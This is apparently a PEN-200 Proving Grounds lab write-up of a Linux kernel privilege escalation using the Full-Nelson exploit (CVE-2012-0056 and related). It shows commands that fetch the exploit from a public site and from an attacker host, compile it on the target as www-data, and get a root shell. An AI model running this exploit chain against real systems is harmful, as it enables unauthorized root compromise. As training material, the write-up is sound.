Full-Nelson


PEAS has identified that the target system is vulnerable to the Full-Nelson exploits, targeting CVE-2012-0056,CVE-2010-3849,CVE-2010-3850

A vulnerability, which was classified as problematic, has been found in Linux Kernel 2.6.16.9. This issue affects the function econet_sendmsg. The manipulation leads to resource management. The identification of this vulnerability is CVE-2010-3849. Furthermore, there is an exploit available.

A vulnerability, which was classified as problematic, was found in Linux Kernel 2.6.16.9. Affected is the function ec_dev_ioctl. The manipulation leads to access control. This vulnerability is traded as CVE-2010-3850. Furthermore, there is an exploit available.

A vulnerability classified as critical has been found in Linux Kernel 2.6.39. Affected is the function mem_write. The manipulation leads to access control. This vulnerability is traded as CVE-2012-0056. Furthermore, there is an exploit available.

Exploit


Exploit available online

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/zenphoto]
└─$ wget http://vulnfactory.org/exploits/full-nelson.c
--2025-03-24 15:20:14--  http://vulnfactory.org/exploits/full-nelson.c
Resolving vulnfactory.org (vulnfactory.org)... 198.54.116.186
Connecting to vulnfactory.org (vulnfactory.org)|198.54.116.186|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9400 (9.2K) [text/plain]
Saving to: ‘full-nelson.c’
 
full-nelson.c          100%[============================>]   9.18K  --.-KB/s    in 0s      
 
2025-03-24 15:20:15 (490 MB/s) - ‘full-nelson.c’ saved [9400/9400]

Downloading the exploit

Exploitation


www-data@offsecsrv:/var/tmp$ wget -q http://192.168.45.192/full-nelson.c

Delivery complete

www-data@offsecsrv:/var/tmp$ gcc full-nelson.c -o full-nelson

Compile

www-data@offsecsrv:/var/tmp$ ./full-nelson
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf82322d0
 [+] Resolved econet_ops to 0xf82323c0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# whoami
whoami
root
# hostname
hostname
offsecsrv
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:50:56:9e:5f:f6 brd ff:ff:ff:ff:ff:ff
    inet 192.168.132.41/24 brd 192.168.132.255 scope global eth0
    inet6 fe80::250:56ff:fe9e:5ff6/64 scope link 
       valid_lft forever preferred_lft forever

System level compromise